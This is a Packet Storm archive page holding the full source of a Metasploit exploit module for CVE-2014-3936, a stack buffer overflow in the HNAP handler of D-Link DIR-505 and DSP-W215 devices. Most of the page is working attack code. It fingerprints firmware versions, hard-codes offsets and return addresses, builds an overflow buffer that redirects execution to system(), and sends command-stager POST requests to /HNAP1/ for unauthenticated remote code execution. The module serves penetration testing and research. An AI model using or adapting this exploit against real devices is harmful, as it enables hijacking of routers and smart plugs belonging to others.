exploit the possibilities

D-Link HNAP Request Remote Buffer Overflow

D-Link HNAP Request Remote Buffer Overflow
Posted Jul 11, 2014
Authored by Craig Heffner | Site metasploit.com

This Metasploit module exploits an anonymous remote code execution vulnerability on different D-Link devices. The vulnerability is due to an stack based buffer overflow while handling malicious HTTP POST requests addressed to the HNAP handler. This Metasploit module has been successfully tested on D-Link DIR-505 in an emulated environment.

tags | exploit, remote, web, overflow, code execution
advisories | CVE-2014-3936
MD5 | 27690b7b0e20b8d8e44f2d6a42ccbd96

D-Link HNAP Request Remote Buffer Overflow

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link HNAP Request Remote Buffer Overflow',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different
D-Link devices. The vulnerability is due to an stack based buffer overflow while
handling malicious HTTP POST requests addressed to the HNAP handler. This module
has been successfully tested on D-Link DIR-505 in an emulated environment.
},
'Author' =>
[
'Craig Heffner', # vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'References' =>
[
['CVE', '2014-3936'],
['BID', '67651'],
['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
],
'Targets' =>
[
#
# Automatic targeting via fingerprinting
#
[ 'Automatic Targeting', { 'auto' => true } ],
[ 'D-Link DSP-W215 - v1.0',
{
'Offset' => 1000000,
'Ret' => 0x405cac, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.06',
{
'Offset' => 30000,
'Ret' => 0x405234, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.07',
{
'Offset' => 30000,
'Ret' => 0x405c5c, # jump to system - my_cgi.cgi
}
]
],
'DisclosureDate' => 'May 15 2014',
'DefaultTarget' => 0))

deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end

def check
begin
res = send_request_cgi({
'uri' => "/HNAP1/",
'method' => 'GET'
})

if res && [200, 301, 302].include?(res.code)
if res.body =~ /DIR-505/ && res.body =~ /1.07/
@my_target = targets[3] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
@my_target = targets[2] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end

Exploit::CheckCode::Unknown
end

def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")

@my_target = target
check_code = check

unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
end

if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
end

print_status("#{peer} - Exploiting #{@my_target.name}...")
execute_cmdstager(
:flavor => :echo,
:linemax => 185
)
end

def prepare_shellcode(cmd)
buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
buf << rand_text_alpha_upper(4) # $s0, don't care
buf << rand_text_alpha_upper(4) # $s1, don't care
buf << rand_text_alpha_upper(4) # $s2, don't care
buf << rand_text_alpha_upper(4) # $s3, don't care
buf << rand_text_alpha_upper(4) # $s4, don't care
buf << [@my_target.ret].pack("N") # $ra

# la $t9, system
# la $s1, 0x440000
# jalr $t9 ; system
# addiu $a0, $sp, 0x28 # our command

buf << rand_text_alpha_upper(40) # Stack filler
buf << cmd # Command to execute
buf << "\x00" # NULL-terminate the command
end

def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)

begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/HNAP1/",
'encode_params' => false,
'data' => shellcode
}, 5)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    15 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close